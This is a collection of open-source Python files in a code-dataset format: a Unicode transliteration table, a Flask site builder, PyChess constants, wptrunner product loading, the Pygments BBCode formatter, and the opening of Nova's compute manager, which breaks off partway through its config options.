(0x2C71, u"v"),
(0x2C74, u"v"),
(0xA75F, u"v"),
(0xFF56, u"v"),
(0xA760, u"VY"),
(0x24B1, u"(v)"),
(0xA761, u"vy"),
(0x174, u"W"),
(0x1F7, u"W"),
(0x1D21, u"W"),
(0x1E80, u"W"),
(0x1E82, u"W"),
(0x1E84, u"W"),
(0x1E86, u"W"),
(0x1E88, u"W"),
(0x24CC, u"W"),
(0x2C72, u"W"),
(0xFF37, u"W"),
(0x175, u"w"),
(0x1BF, u"w"),
(0x28D, u"w"),
(0x1E81, u"w"),
(0x1E83, u"w"),
(0x1E85, u"w"),
(0x1E87, u"w"),
(0x1E89, u"w"),
(0x1E98, u"w"),
(0x24E6, u"w"),
(0x2C73, u"w"),
(0xFF57, u"w"),
(0x24B2, u"(w)"),
(0x1E8A, u"X"),
(0x1E8C, u"X"),
(0x24CD, u"X"),
(0xFF38, u"X"),
(0x1D8D, u"x"),
(0x1E8B, u"x"),
(0x1E8D, u"x"),
(0x2093, u"x"),
(0x24E7, u"x"),
(0xFF58, u"x"),
(0x24B3, u"(x)"),
(0xDD, u"Y"),
(0x176, u"Y"),
(0x178, u"Y"),
(0x1B3, u"Y"),
(0x232, u"Y"),
(0x24E, u"Y"),
(0x28F, u"Y"),
(0x1E8E, u"Y"),
(0x1EF2, u"Y"),
(0x1EF4, u"Y"),
(0x1EF6, u"Y"),
(0x1EF8, u"Y"),
(0x1EFE, u"Y"),
(0x24CE, u"Y"),
(0xFF39, u"Y"),
(0xFD, u"y"),
(0xFF, u"y"),
(0x177, u"y"),
(0x1B4, u"y"),
(0x233, u"y"),
(0x24F, u"y"),
(0x28E, u"y"),
(0x1E8F, u"y"),
(0x1E99, u"y"),
(0x1EF3, u"y"),
(0x1EF5, u"y"),
(0x1EF7, u"y"),
(0x1EF9, u"y"),
(0x1EFF, u"y"),
(0x24E8, u"y"),
(0xFF59, u"y"),
(0x24B4, u"(y)"),
(0x179, u"Z"),
(0x17B, u"Z"),
(0x17D, u"Z"),
(0x1B5, u"Z"),
(0x21C, u"Z"),
(0x224, u"Z"),
(0x1D22, u"Z"),
(0x1E90, u"Z"),
(0x1E92, u"Z"),
(0x1E94, u"Z"),
(0x24CF, u"Z"),
(0x2C6B, u"Z"),
(0xA762, u"Z"),
(0xFF3A, u"Z"),
(0x17A, u"z"),
(0x17C, u"z"),
(0x17E, u"z"),
(0x1B6, u"z"),
(0x21D, u"z"),
(0x225, u"z"),
(0x240, u"z"),
(0x290, u"z"),
(0x291, u"z"),
(0x1D76, u"z"),
(0x1D8E, u"z"),
(0x1E91, u"z"),
(0x1E93, u"z"),
(0x1E95, u"z"),
(0x24E9, u"z"),
(0x2C6C, u"z"),
(0xA763, u"z"),
(0xFF5A, u"z"),
(0x24B5, u"(z)"),
(0x2070, u"0"),
(0x2080, u"0"),
(0x24EA, u"0"),
(0x24FF, u"0"),
(0xFF10, u"0"),
(0xB9, u"1"),
(0x2081, u"1"),
(0x2460, u"1"),
(0x24F5, u"1"),
(0x2776, u"1"),
(0x2780, u"1"),
(0x278A, u"1"),
(0xFF11, u"1"),
(0x2488, u"1."),
(0x2474, u"(1)"),
(0xB2, u"2"),
(0x2082, u"2"),
(0x2461, u"2"),
(0x24F6, u"2"),
(0x2777, u"2"),
(0x2781, u"2"),
(0x278B, u"2"),
(0xFF12, u"2"),
(0x2489, u"2."),
(0x2475, u"(2)"),
(0xB3, u"3"),
(0x2083, u"3"),
(0x2462, u"3"),
(0x24F7, u"3"),
(0x2778, u"3"),
(0x2782, u"3"),
(0x278C, u"3"),
(0xFF13, u"3"),
(0x248A, u"3."),
(0x2476, u"(3)"),
(0x2074, u"4"),
(0x2084, u"4"),
(0x2463, u"4"),
(0x24F8, u"4"),
(0x2779, u"4"),
(0x2783, u"4"),
(0x278D, u"4"),
(0xFF14, u"4"),
(0x248B, u"4."),
(0x2477, u"(4)"),
(0x2075, u"5"),
(0x2085, u"5"),
(0x2464, u"5"),
(0x24F9, u"5"),
(0x277A, u"5"),
(0x2784, u"5"),
(0x278E, u"5"),
(0xFF15, u"5"),
(0x248C, u"5."),
(0x2478, u"(5)"),
(0x2076, u"6"),
(0x2086, u"6"),
(0x2465, u"6"),
(0x24FA, u"6"),
(0x277B, u"6"),
(0x2785, u"6"),
(0x278F, u"6"),
(0xFF16, u"6"),
(0x248D, u"6."),
(0x2479, u"(6)"),
(0x2077, u"7"),
(0x2087, u"7"),
(0x2466, u"7"),
(0x24FB, u"7"),
(0x277C, u"7"),
(0x2786, u"7"),
(0x2790, u"7"),
(0xFF17, u"7"),
(0x248E, u"7."),
(0x247A, u"(7)"),
(0x2078, u"8"),
(0x2088, u"8"),
(0x2467, u"8"),
(0x24FC, u"8"),
(0x277D, u"8"),
(0x2787, u"8"),
(0x2791, u"8"),
(0xFF18, u"8"),
(0x248F, u"8."),
(0x247B, u"(8)"),
(0x2079, u"9"),
(0x2089, u"9"),
(0x2468, u"9"),
(0x24FD, u"9"),
(0x277E, u"9"),
(0x2788, u"9"),
(0x2792, u"9"),
(0xFF19, u"9"),
(0x2490, u"9."),
(0x247C, u"(9)"),
(0x2469, u"10"),
(0x24FE, u"10"),
(0x277F, u"10"),
(0x2789, u"10"),
(0x2793, u"10"),
(0x2491, u"10."),
(0x247D, u"(10)"),
(0x246A, u"11"),
(0x24EB, u"11"),
(0x2492, u"11."),
(0x247E, u"(11)"),
(0x246B, u"12"),
(0x24EC, u"12"),
(0x2493, u"12."),
(0x247F, u"(12)"),
(0x246C, u"13"),
(0x24ED, u"13"),
(0x2494, u"13."),
(0x2480, u"(13)"),
(0x246D, u"14"),
(0x24EE, u"14"),
(0x2495, u"14."),
(0x2481, u"(14)"),
(0x246E, u"15"),
(0x24EF, u"15"),
(0x2496, u"15."),
(0x2482, u"(15)"),
(0x246F, u"16"),
(0x24F0, u"16"),
(0x2497, u"16."),
(0x2483, u"(16)"),
(0x2470, u"17"),
(0x24F1, u"17"),
(0x2498, u"17."),
(0x2484, u"(17)"),
(0x2471, u"18"),
(0x24F2, u"18"),
(0x2499, u"18."),
(0x2485, u"(18)"),
(0x2472, u"19"),
(0x24F3, u"19"),
(0x249A, u"19."),
(0x2486, u"(19)"),
(0x2473, u"20"),
(0x24F4, u"20"),
(0x249B, u"20."),
(0x2487, u"(20)"),
(0xAB, u'"'),
(0xBB, u'"'),
(0x201C, u'"'),
(0x201D, u'"'),
(0x201E, u'"'),
(0x2033, u'"'),
(0x2036, u'"'),
(0x275D, u'"'),
(0x275E, u'"'),
(0x276E, u'"'),
(0x276F, u'"'),
(0xFF02, u'"'),
(0x2018, u"'"),
(0x2019, u"'"),
(0x201A, u"'"),
(0x201B, u"'"),
(0x2032, u"'"),
(0x2035, u"'"),
(0x2039, u"'"),
(0x203A, u"'"),
(0x275B, u"'"),
(0x275C, u"'"),
(0xFF07, u"'"),
(0x2010, u"-"),
(0x2011, u"-"),
(0x2012, u"-"),
(0x2013, u"-"),
(0x2014, u"-"),
(0x207B, u"-"),
(0x208B, u"-"),
(0xFF0D, u"-"),
(0x2045, u"["),
(0x2772, u"["),
(0xFF3B, u"["),
(0x2046, u"]"),
(0x2773, u"]"),
(0xFF3D, u"]"),
(0x207D, u"("),
(0x208D, u"("),
(0x2768, u"("),
(0x276A, u"("),
(0xFF08, u"("),
(0x2E28, u"(("),
(0x207E, u")"),
(0x208E, u")"),
(0x2769, u")"),
(0x276B, u")"),
(0xFF09, u")"),
(0x2E29, u"))"),
(0x276C, u"<"),
(0x2770, u"<"),
(0xFF1C, u"<"),
(0x276D, u">"),
(0x2771, u">"),
(0xFF1E, u">"),
(0x2774, u"{"),
(0xFF5B, u"{"),
(0x2775, u"}"),
(0xFF5D, u"}"),
(0x207A, u"+"),
(0x208A, u"+"),
(0xFF0B, u"+"),
(0x207C, u"="),
(0x208C, u"="),
(0xFF1D, u"="),
(0xFF01, u"!"),
(0x203C, u"!!"),
(0x2049, u"!?"),
(0xFF03, u"#"),
(0xFF04, u"$"),
(0x2052, u"%"),
(0xFF05, u"%"),
(0xFF06, u"&"),
(0x204E, u"*"),
(0xFF0A, u"*"),
(0xFF0C, u","),
(0xFF0E, u"."),
(0x2044, u"/"),
(0xFF0F, u"/"),
(0xFF1A, u":"),
(0x204F, u";"),
(0xFF1B, u";"),
(0xFF1F, u"?"),
(0x2047, u"??"),
(0x2048, u"?!"),
(0xFF20, u"@"),
(0xFF3C, u"\\"),
(0x2038, u"^"),
(0xFF3E, u"^"),
(0xFF3F, u"_"),
(0x2053, u"~"),
(0xFF5E, u"~"),
]
translate_table = codepoint_to_self + codepoint_to_replacement
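# Minimal usage sketch (Python 2, matching the unicode literals above):
#
#   table = dict(translate_table)
#   print(u"\xc0pple".translate(table))   # -> u"Apple"; unmapped codepoints pass through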
| gpl-3.0 |
lem-usp/Bio507 | site.py | 1 | 3672 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # unicode by default
import sys
import datetime
from collections import OrderedDict
import pandoc
#import bib
from flask import Flask
from flask import render_template, redirect, url_for
from flaskext.babel import Babel
from flask_flatpages import FlatPages
from flask_frozen import Freezer
# TODO:
# * Get babel locale from request path
# Create the Flask app
app = Flask(__name__)
# Load settings
app.config.from_pyfile('settings/common.py')
app.config.from_pyfile('settings/local_settings.py', silent=True)
if len(sys.argv) > 2:
extra_conf = sys.argv[2]
app.config.from_pyfile('settings/{}_settings.py'.format(extra_conf), silent=True)
# Add the babel extension
babel = Babel(app)
# Add the FlatPages extension
pages = FlatPages(app)
# Add the Frozen extension
freezer = Freezer(app)
#
# Utils
#
# Frozen url generators
@freezer.register_generator
def default_locale_urls():
''' Generates the urls for the default locale without prefix. '''
for page in pages:
yield '/{}/'.format(remove_l10n_prefix(page.path))
@freezer.register_generator
def page_urls():
''' Generates the urls with locale prefix. '''
for page in pages:
yield '/{}/'.format(page.path)
# l10n helpers
def has_l10n_prefix(path):
''' Verifies if the path have a localization prefix. '''
return reduce(lambda x, y: x or y, [path.startswith(l)
for l in app.config.get('AVAILABLE_LOCALES', [])])
def add_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
''' Add localization prefix if necessary. '''
return path if has_l10n_prefix(path) else '{}/{}'.format(locale, path)
def remove_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
''' Remove specific localization prefix. '''
return path if not path.startswith(locale) else path[(len(locale) + 1):]
# Make remove_l10n_prefix accessible to Jinja
app.jinja_env.globals.update(remove_l10n_prefix=remove_l10n_prefix)
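# Behaviour of the helpers above, assuming DEFAULT_LOCALE = 'en' and 'en' listed
# in AVAILABLE_LOCALES (values are illustrative):
#
#   add_l10n_prefix('Main')        # -> 'en/Main'
#   remove_l10n_prefix('en/Main')  # -> 'Main'
#   has_l10n_prefix('Main')        # -> False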
# Structure helpers
def render_markdown(text):
''' Render Markdown text to HTML. '''
doc = pandoc.Document()
# doc.bib(app.config.get('BIB_FILE', 'static/papers.bib'))
doc.markdown = text.encode('utf8')
return unicode(doc.html, 'utf8')
app.config['FLATPAGES_HTML_RENDERER'] = render_markdown
#
# Routes
#
@app.route('/')
def root():
''' Main page '''
# Get the page
path = 'Main'
page = pages.get_or_404(add_l10n_prefix(path))
today = datetime.datetime.now().strftime("%B %dth %Y")
return render_template('root.html', today=today, page=page, pages=pages)
#def get_papers():
# bib_file = open(app.config.get('BIB_FILE', 'static/papers.bib'))
# b = bib.Bibparser(bib_file.read())
# b.parse()
# return b
@app.route('/<path:path>/')
def page(path):
''' All pages from markdown files '''
# Get the page
page = pages.get_or_404(add_l10n_prefix(path))
# Get custom template
template = page.meta.get('template', 'page.html')
# Verify if need redirect
redirect_ = page.meta.get('redirect', None)
if redirect_:
return redirect(url_for('page', path=redirect_))
# if path == 'Papers' or path == add_l10n_prefix('Papers'):
# b = get_papers()
# return render_template(template, page=page, pages=pages, bib=b)
today = datetime.datetime.now().strftime("%B %dth %Y")
# Render the page
return render_template(template, page=page, today=today, pages=pages)
#
# Main
#
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'build':
freezer.freeze()
else:
app.run(port=8000)
| mit |
importsfromgooglecode/pychess | lib/pychess/Utils/const.py | 20 | 9143 | # -*- coding: UTF-8 -*-
################################################################################
# PyChess information #
################################################################################
NAME = "PyChess"
ENGINES_XML_API_VERSION = "0.12"
################################################################################
# Player info #
################################################################################
# Player types
LOCAL, ARTIFICIAL, REMOTE = range(3)
# Engine strengths
EASY, INTERMEDIATE, EXPERT = range(3)
# Player colors
WHITE, BLACK = range(2)
################################################################################
# Game values #
################################################################################
# Game states
WAITING_TO_START, PAUSED, RUNNING, DRAW, WHITEWON, BLACKWON, KILLED, \
ADJOURNED, ABORTED, UNKNOWN_STATE = range(10)
reprResult = ["*", "*", "*", "1/2-1/2", "1-0", "0-1", "?", "*", "?", "?"]
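# For reference, reprResult is indexed by the game-state constants above,
# e.g. reprResult[WHITEWON] == "1-0" and reprResult[DRAW] == "1/2-1/2".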
UNDOABLE_STATES = (DRAW, WHITEWON, BLACKWON)
UNFINISHED_STATES = (WAITING_TO_START, PAUSED, RUNNING, UNKNOWN_STATE)
# Chess variants
NORMALCHESS, CORNERCHESS, SHUFFLECHESS, FISCHERRANDOMCHESS, RANDOMCHESS, \
ASYMMETRICRANDOMCHESS, UPSIDEDOWNCHESS, PAWNSPUSHEDCHESS, PAWNSPASSEDCHESS, \
THEBANCHESS, PAWNODDSCHESS, KNIGHTODDSCHESS, ROOKODDSCHESS, QUEENODDSCHESS, \
BLINDFOLDCHESS, HIDDENPAWNSCHESS, HIDDENPIECESCHESS, ALLWHITECHESS, \
ATOMICCHESS, BUGHOUSECHESS, CRAZYHOUSECHESS, LOSERSCHESS, SUICIDECHESS, \
WILDCASTLECHESS, WILDCASTLESHUFFLECHESS, KINGOFTHEHILLCHESS = range(26)
UNSUPPORTED = (BUGHOUSECHESS,)
# Chess variant groups
VARIANTS_BLINDFOLD, VARIANTS_ODDS, VARIANTS_SHUFFLE, VARIANTS_OTHER, VARIANTS_OTHER_NONSTANDARD = range(5)
# Action errors
ACTION_ERROR_NOT_OUT_OF_TIME, \
ACTION_ERROR_CLOCK_NOT_STARTED, ACTION_ERROR_SWITCH_UNDERWAY, \
ACTION_ERROR_CLOCK_NOT_PAUSED, ACTION_ERROR_TOO_LARGE_UNDO, \
ACTION_ERROR_NONE_TO_ACCEPT, ACTION_ERROR_NONE_TO_WITHDRAW, \
ACTION_ERROR_NONE_TO_DECLINE, = range(8)
# Game state reasons
ABORTED_ADJUDICATION, ABORTED_AGREEMENT, ABORTED_COURTESY, ABORTED_EARLY, \
ABORTED_SERVER_SHUTDOWN, ADJOURNED_COURTESY, ABORTED_DISCONNECTION, \
ADJOURNED_AGREEMENT, ADJOURNED_LOST_CONNECTION, ADJOURNED_SERVER_SHUTDOWN, \
ADJOURNED_COURTESY_WHITE, ADJOURNED_COURTESY_BLACK, \
ADJOURNED_LOST_CONNECTION_WHITE, ADJOURNED_LOST_CONNECTION_BLACK, \
DRAW_50MOVES, DRAW_ADJUDICATION, DRAW_AGREE, DRAW_CALLFLAG, DRAW_INSUFFICIENT, \
DRAW_EQUALMATERIAL, DRAW_LENGTH, DRAW_REPITITION, DRAW_STALEMATE, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_ADJUDICATION, WON_CALLFLAG, WON_DISCONNECTION, WON_MATE, WON_RESIGN, \
WON_LESSMATERIAL, WON_NOMATERIAL, WON_KINGEXPLODE, WON_KINGINCENTER, \
WHITE_ENGINE_DIED, BLACK_ENGINE_DIED, DISCONNECTED, UNKNOWN_REASON = range(38)
UNDOABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH,
DRAW_REPITITION, DRAW_STALEMATE, DRAW_AGREE, DRAW_CALLFLAG, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, \
DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_MATE, WON_NOMATERIAL, WON_CALLFLAG, WON_RESIGN)
UNRESUMEABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH, \
DRAW_REPITITION, DRAW_STALEMATE, WON_MATE, WON_NOMATERIAL)
# Player actions
RESIGNATION = "resignation"
FLAG_CALL = "flag call"
DRAW_OFFER = "draw offer"
ABORT_OFFER = "abort offer"
ADJOURN_OFFER = "adjourn offer"
PAUSE_OFFER = "pause offer"
RESUME_OFFER = "resume offer"
SWITCH_OFFER = "switch offer"
TAKEBACK_OFFER = "takeback offer"
MATCH_OFFER = "match offer"
HURRY_ACTION = "hurry action"
CHAT_ACTION = "chat action"
ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, \
PAUSE_OFFER, RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, \
MATCH_OFFER, HURRY_ACTION, CHAT_ACTION)
OFFERS = (DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, PAUSE_OFFER, \
RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, MATCH_OFFER)
INGAME_ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, \
ADJOURN_OFFER, PAUSE_OFFER, SWITCH_OFFER, HURRY_ACTION)
# A few nice to have boards
FEN_EMPTY = "4k3/8/8/8/8/8/8/4K3 w - - 0 1"
FEN_START = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
################################################################################
# Search values #
################################################################################
hashfALPHA, hashfBETA, hashfEXACT, hashfBAD = range(4)
# Engine modes
NORMAL, ANALYZING, INVERSE_ANALYZING = range(3)
################################################################################
# Piece types #
################################################################################
# BPAWN is a pawn that moves in the opposite direction
EMPTY, PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, BPAWN = range(8)
# Is sliding piece
sliders = [ False, False, False, True, True, True, False, False ]
# Piece signs
reprSign = ["", "P", "N", "B", "R", "Q", "K"]
chr2Sign = {"k":KING, "q": QUEEN, "r": ROOK, "b": BISHOP, "n": KNIGHT, "p":PAWN}
chrU2Sign = {"K":KING, "Q": QUEEN, "R": ROOK, "B": BISHOP, "N": KNIGHT, "P":PAWN}
################################################################################
# Move values #
################################################################################
NORMAL_MOVE, QUEEN_CASTLE, KING_CASTLE, ENPASSANT, \
KNIGHT_PROMOTION, BISHOP_PROMOTION, ROOK_PROMOTION, QUEEN_PROMOTION, KING_PROMOTION, NULL_MOVE, DROP = range(11)
PROMOTIONS = (KING_PROMOTION, QUEEN_PROMOTION, ROOK_PROMOTION, BISHOP_PROMOTION, KNIGHT_PROMOTION)
# Algebraic notation types: Short, Long, Figure and Simple
SAN, LAN, FAN, AN = range(4)
# Castling notation types: e.g., O-O, e1g1, e1h1
CASTLE_SAN, CASTLE_KK, CASTLE_KR = range(3)
FAN_PIECES = [
["", u"♙", u"♘", u"♗", u"♖", u"♕", u"♔", ""],
["", u"♟", u"♞", u"♝", u"♜", u"♛", u"♚", ""]
]
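# Illustrative reading of the table above (not part of the original module):
# FAN_PIECES[WHITE][KNIGHT] == u"♘" and FAN_PIECES[BLACK][QUEEN] == u"♛",
# i.e. the first index selects the side to render, the second the piece type.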
################################################################################
# Castling values #
################################################################################
W_OO, W_OOO, B_OO, B_OOO = [2**i for i in range(4)]
CAS_FLAGS = ((W_OOO,W_OO),(B_OOO,B_OO))
W_CASTLED, B_CASTLED = [2**i for i in range(2)]
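# Illustrative reading of the bit flags above (not part of the original module):
# W_OO == 1, W_OOO == 2, B_OO == 4, B_OOO == 8, so a position where only white
# may still castle on either side carries the mask W_OO | W_OOO == 3, and
# CAS_FLAGS[WHITE] yields the (queen-side, king-side) pair (W_OOO, W_OO).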
################################################################################
# Cords types #
################################################################################
A1, B1, C1, D1, E1, F1, G1, H1, \
A2, B2, C2, D2, E2, F2, G2, H2, \
A3, B3, C3, D3, E3, F3, G3, H3, \
A4, B4, C4, D4, E4, F4, G4, H4, \
A5, B5, C5, D5, E5, F5, G5, H5, \
A6, B6, C6, D6, E6, F6, G6, H6, \
A7, B7, C7, D7, E7, F7, G7, H7, \
A8, B8, C8, D8, E8, F8, G8, H8 = range (64)
reprCord = [
"a1", "b1", "c1", "d1", "e1", "f1", "g1", "h1",
"a2", "b2", "c2", "d2", "e2", "f2", "g2", "h2",
"a3", "b3", "c3", "d3", "e3", "f3", "g3", "h3",
"a4", "b4", "c4", "d4", "e4", "f4", "g4", "h4",
"a5", "b5", "c5", "d5", "e5", "f5", "g5", "h5",
"a6", "b6", "c6", "d6", "e6", "f6", "g6", "h6",
"a7", "b7", "c7", "d7", "e7", "f7", "g7", "h7",
"a8", "b8", "c8", "d8", "e8", "f8", "g8", "h8"
]
reprFile = ["a", "b", "c", "d", "e", "f", "g", "h"]
reprRank = ["1", "2", "3", "4", "5", "6", "7", "8"]
cordDic = {}
for cord, name in enumerate(reprCord):
cordDic[name] = cord
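# Illustrative example of the coordinate helpers above (not part of the module):
# cordDic["e4"] == 28 and reprCord[28] == "e4"; the file and rank of a cord can
# be read back as reprFile[28 & 7] == "e" and reprRank[28 >> 3] == "4".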
################################################################################
# User interface #
################################################################################
# Hint modes
OPENING, ENDGAME, HINT, SPY = ["opening", "endgame", "hint", "spy"]
# Sound settings
SOUND_MUTE, SOUND_BEEP, SOUND_SELECT, SOUND_URI = range(4)
# Brush types. Send piece object for Piece brush
CLEAR, ENPAS = range(2)
# Main menu items
GAME_MENU_ITEMS = ("save_game1", "save_game_as1", "export_position1", "analyze_game1",
"properties1", "close1")
ACTION_MENU_ITEMS = ("abort", "adjourn", "draw", "pause1", "resume1", "undo1",
"call_flag", "resign", "ask_to_move")
VIEW_MENU_ITEMS = ("rotate_board1", "show_sidepanels", "hint_mode", "spy_mode")
MENU_ITEMS = GAME_MENU_ITEMS + ACTION_MENU_ITEMS + VIEW_MENU_ITEMS
################################################################################
# Subprocess #
################################################################################
SUBPROCESS_PTY, SUBPROCESS_SUBPROCESS, SUBPROCESS_FORK = range(3)
| gpl-3.0 |
sliz1/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
names = config.get("products", {}).keys()
if not names:
return product_list
else:
return names
def product_module(config, product):
here = os.path.join(os.path.split(__file__)[0])
product_dir = os.path.join(here, "browsers")
if product not in products_enabled(config):
raise ValueError("Unknown product %s" % product)
path = config.get("products", {}).get(product, None)
if path:
module = imp.load_source('wptrunner.browsers.' + product, path)
else:
module = importlib.import_module("wptrunner.browsers." + product)
if not hasattr(module, "__wptrunner__"):
raise ValueError("Product module does not define __wptrunner__ variable")
return module
def load_product(config, product):
module = product_module(config, product)
data = module.__wptrunner__
check_args = getattr(module, data["check_args"])
browser_cls = getattr(module, data["browser"])
browser_kwargs = getattr(module, data["browser_kwargs"])
executor_kwargs = getattr(module, data["executor_kwargs"])
env_options = getattr(module, data["env_options"])()
run_info_extras = (getattr(module, data["run_info_extras"])
if "run_info_extras" in data else lambda **kwargs:{})
executor_classes = {}
for test_type, cls_name in data["executor"].iteritems():
cls = getattr(module, cls_name)
executor_classes[test_type] = cls
return (check_args,
browser_cls, browser_kwargs,
executor_classes, executor_kwargs,
env_options, run_info_extras)
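# Illustrative usage sketch (hypothetical config and product name, not part of
# this module): callers typically unpack the tuple returned above, e.g.
#   (check_args, browser_cls, browser_kwargs, executor_classes,
#    executor_kwargs, env_options, run_info_extras) = load_product({}, "firefox")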
def load_product_update(config, product):
"""Return tuple of (property_order, boolean_properties) indicating the
run_info properties to use when constructing the expectation data for
this product. None for either key indicates that the default keys
appropriate for distinguishing based on platform will be used."""
module = product_module(config, product)
data = module.__wptrunner__
update_properties = (getattr(module, data["update_properties"])()
if "update_properties" in data else (None, None))
return update_properties
| mpl-2.0 |
vicky2135/lucious | oscar/lib/python2.7/site-packages/pygments/formatters/bbcode.py | 31 | 3314 | # -*- coding: utf-8 -*-
"""
pygments.formatters.bbcode
~~~~~~~~~~~~~~~~~~~~~~~~~~
BBcode formatter.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt
__all__ = ['BBCodeFormatter']
class BBCodeFormatter(Formatter):
"""
Format tokens with BBcodes. These formatting codes are used by many
bulletin boards, so you can highlight your source code with pygments before
posting it there.
This formatter has no support for background colors and borders, as there
are no common BBcode tags for that.
Some board systems (e.g. phpBB) don't support colors in their [code] tag,
so you can't use the highlighting together with that tag.
Text in a [code] tag is usually shown with a monospace font (which this
formatter can also produce via the ``monofont`` option), and the spaces
you need for indentation are not removed.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`codetag`
If set to true, put the output into ``[code]`` tags (default:
``false``)
`monofont`
If set to true, add a tag to show the code with a monospace font
(default: ``false``).
"""
name = 'BBCode'
aliases = ['bbcode', 'bb']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self._code = get_bool_opt(options, 'codetag', False)
self._mono = get_bool_opt(options, 'monofont', False)
self.styles = {}
self._make_styles()
def _make_styles(self):
for ttype, ndef in self.style:
start = end = ''
if ndef['color']:
start += '[color=#%s]' % ndef['color']
end = '[/color]' + end
if ndef['bold']:
start += '[b]'
end = '[/b]' + end
if ndef['italic']:
start += '[i]'
end = '[/i]' + end
if ndef['underline']:
start += '[u]'
end = '[/u]' + end
# there are no common BBcodes for background-color and border
self.styles[ttype] = start, end
def format_unencoded(self, tokensource, outfile):
if self._code:
outfile.write('[code]')
if self._mono:
outfile.write('[font=monospace]')
lastval = ''
lasttype = None
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
if ttype == lasttype:
lastval += value
else:
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
lastval = value
lasttype = ttype
if lastval:
start, end = self.styles[lasttype]
outfile.write(''.join((start, lastval, end)))
if self._mono:
outfile.write('[/font]')
if self._code:
outfile.write('[/code]')
if self._code or self._mono:
outfile.write('\n')
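# Illustrative usage (not part of this file; assumes Pygments is importable):
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   bb = highlight('print("hi")', PythonLexer(), BBCodeFormatter(codetag=True))
#   # 'bb' is the source wrapped in [code]...[/code] with per-token [color=#...]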
| bsd-3-clause |
alexandrucoman/vbox-nova-driver | nova/compute/manager.py | 1 | 323194 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import contextlib
import functools
import socket
import sys
import time
import traceback
import uuid
from cinderclient import exceptions as cinder_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneclient import exceptions as keystone_exception
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.cloudpipe import pipelib
from nova import compute
from nova.compute import build_results
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova import consoleauth
import nova.context
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova.image import glance
from nova import manager
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import loopingcall
from nova.openstack.common import periodic_task
from nova import paths
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova import volume
from nova.volume import encryptors
compute_opts = [
cfg.StrOpt('console_host',
default=socket.gethostname(),
help='Console proxy host to use to connect '
'to instances on this host.'),
cfg.StrOpt('default_access_ip_network_name',
help='Name of network to use to set access IPs for instances'),
cfg.BoolOpt('defer_iptables_apply',
default=False,
help='Whether to batch up the application of IPTables rules'
' during a host restart and apply all at the end of the'
' init phase'),
cfg.StrOpt('instances_path',
default=paths.state_path_def('instances'),
help='Where instances are stored on disk'),
cfg.BoolOpt('instance_usage_audit',
default=False,
help="Generate periodic compute.instance.exists"
" notifications"),
cfg.IntOpt('live_migration_retry_count',
default=30,
help="Number of 1 second retries needed in live_migration"),
cfg.BoolOpt('resume_guests_state_on_host_boot',
default=False,
help='Whether to start guests that were running before the '
'host rebooted'),
cfg.IntOpt('network_allocate_retries',
default=0,
help="Number of times to retry network allocation on failures"),
cfg.IntOpt('max_concurrent_builds',
default=10,
